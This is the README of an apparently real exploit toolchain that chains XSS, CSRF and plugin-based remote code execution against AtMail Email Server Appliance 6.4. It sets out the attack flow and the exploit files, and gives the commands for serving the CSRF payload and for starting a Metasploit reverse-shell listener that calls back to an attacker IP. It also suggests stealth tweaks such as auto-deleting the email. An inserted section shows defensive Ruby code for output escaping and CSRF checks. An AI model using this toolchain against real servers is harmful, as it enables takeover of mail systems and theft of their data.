https://github.com/noraj/atmail-exploit-toolchain

# AtMail Email Server Appliance 6.4 - Exploit toolchain (XSS > CSRF > RCE)

[[PacketStorm](https://packetstormsecurity.com/files/158710/AtMail-Email-Server-Appliance-6.4-XSS-CSRF-Code-Execution.html)] [[WLB-2020080010](https://cxsecurity.com/issue/WLB-2020080010)]

Disclaimer: this exploit toolchain was inspired by [EDB-ID 20009][20009].

## Goal

The goal of this exploit toolchain is to replace [EDB-ID 20009][20009].

Pros of this toolchain over [EDB-ID 20009][20009] exploit:

+ Simple to use
+ Reusable
+ Dynamically generated payloads
+ Easily editable / hackable
+ Clear code and plugin available

Cons of [EDB-ID 20009][20009] exploit:

- Not customizable (static hardcoded payloads)
- Complex to use (many hardcoded values must be replaced and the code adapted to suit the target environment)
- One-shot use (all values hardcoded)
- The plugin archive (tgz) is embedded as a hex string, so the plugin source code can't be easily read or modified

## Requirements

- (Optional) [Metasploit Framework][msf] (`msfvenom` for reverse shell generation)
- [tar][tar] (to generate the plugin archive)
- [ruby][ruby] (payloads preparation and XSS SMTP delivery)
- (Optional) A web server to deliver the XSS payload
- Knowing an Atmail admin email address (only admins can install a plugin)
- Passive interaction (the admin needs to trigger the email containing the XSS payload in the WebMail while having a valid administration interface session running)

Install requirements on ArchLinux:

```
$ sudo pacman -S metasploit tar ruby
```

## How it works

1. An email containing an XSS payload is sent to the admin
2. The XSS payload remotely loads the JavaScript CSRF
3. The CSRF installs a plugin
4. Once installed, the plugin executes a system command: the reverse shell
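The chain above works because two server-side checks are missing: the mail body is rendered without HTML escaping (steps 1 and 2), and the plugin-install request is accepted without a CSRF token or origin validation (step 3). The following is an added example, not code from this toolchain or from Atmail, showing what those two checks look like in Ruby; the function names, the `CsrfGuard` class and the `https://mail.example.test` origin are assumptions for illustration. Note the caveat it demonstrates: the token and origin checks reject a forged cross-origin request, but once injected script runs inside the webmail's own origin it can read the token from the page, so escaping untrusted mail content is the decisive fix.

```ruby
# Added example (not part of atmail-exploit-toolchain): the server-side checks
# whose absence the XSS > CSRF > plugin-install chain relies on.
# Names below (render_mail_body, CsrfGuard, the example origin) are assumptions.
require 'cgi'
require 'openssl'
require 'securerandom'

# Mitigation for the XSS step: escape untrusted mail content before it reaches
# the browser, so an injected <script> in a message body is rendered as text.
def render_mail_body(body)
  CGI.escapeHTML(body)
end

# Constant-time string comparison so the token check does not leak a prefix
# match through timing (hand-rolled to stay within the Ruby 2.7 stdlib).
def secure_equal?(a, b)
  return false unless a.is_a?(String) && b.is_a?(String) && a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Mitigation for the CSRF step: a state-changing admin request (such as
# "install plugin") must carry a token bound to the session and must come
# from the application's own origin.
class CsrfGuard
  def initialize(allowed_origin)
    @allowed_origin = allowed_origin
    @secret = SecureRandom.hex(32) # server-side HMAC key, never sent to clients
  end

  # Token embedded in the admin form; derived from the session id so a token
  # captured from one session is useless in another.
  def issue_token(session_id)
    OpenSSL::HMAC.hexdigest('SHA256', @secret, session_id)
  end

  # True only when both the Origin header and the token check out.
  def authorize?(session_id:, origin:, token:)
    return false unless origin == @allowed_origin
    secure_equal?(issue_token(session_id), token)
  end
end

if $PROGRAM_NAME == __FILE__
  guard = CsrfGuard.new('https://mail.example.test')
  sid = 'admin-session-1' # constructed sample session id
  token = guard.issue_token(sid)
  puts "same-origin request with token:  #{guard.authorize?(session_id: sid, origin: 'https://mail.example.test', token: token)}"
  puts "cross-origin request with token: #{guard.authorize?(session_id: sid, origin: 'http://other.example.test:8000', token: token)}"
  puts "same-origin request, no token:   #{guard.authorize?(session_id: sid, origin: 'https://mail.example.test', token: nil)}"
  puts "escaped body: #{render_mail_body('<script>alert(1)</script>')}"
end
```

A real deployment would also bind the token to a short-lived session and set the session cookie with `SameSite`; the point here is that the request forged in step 3 fails the origin check, while a script already executing in the webmail origin does not, which is why the escaping in `render_mail_body` matters most.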

Exploit files:

- `config.yml` contains the toolchain configuration
- `exploit.sh` the exploit wrapper that needs to be executed
- `xss_mail.rb` sends the email containing the XSS to the admin via the Atmail SMTP server (unauthenticated)
- `csrf_prepare.rb` prepares the CSRF payload (setting the target and encoding the plugin archive)
- `rce_prepare.rb` prepares the RCE (generating the reverse shell and creating the plugin archive)
- `csrf_plugin.js` the prepared CSRF payload
- `noraj/` folder containing the uncompressed plugin tree

## Usage

The exploit toolchain requires only 2 manual steps:

1. Edit `config.yml`
2. Launch `exploit.sh`

Before launching the attack, however, a web server needs to deliver the JavaScript CSRF file and a reverse shell listener needs to be waiting for the connection, so the attack looks more like:

1. Edit `config.yml`
2. Start an HTTP server that will deliver `csrf_plugin.js`
3. Start the reverse shell listener
4. Launch `exploit.sh`

Example of a one-line HTTP server:

```
$ ruby -run -e httpd . -p 8000
```

Example of reverse shell listener:

```
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run
```

## Notes

- The RCE occurs only when the plugin is **installed**: if the reverse shell connection is lost, re-executing means re-installing the plugin, so the admin only needs to reload their mailbox.
- Red teamers could enhance the exploit to auto-remove the email once read and to remove the plugin once the reverse shell connection is established: less persistent but stealthier.
- msfvenom (MSF 5.0) only supports an IP address for LHOST, not a domain.
- As said in _Requirements_, the admin needs to be logged in to both the Webmail and the administration interface.
- Tested with ruby 2.7.

[20009]:https://www.exploit-db.com/exploits/20009
[msf]:https://github.com/rapid7/metasploit-framework
[tar]:https://www.gnu.org/software/tar/
[ruby]:https://www.ruby-lang.org/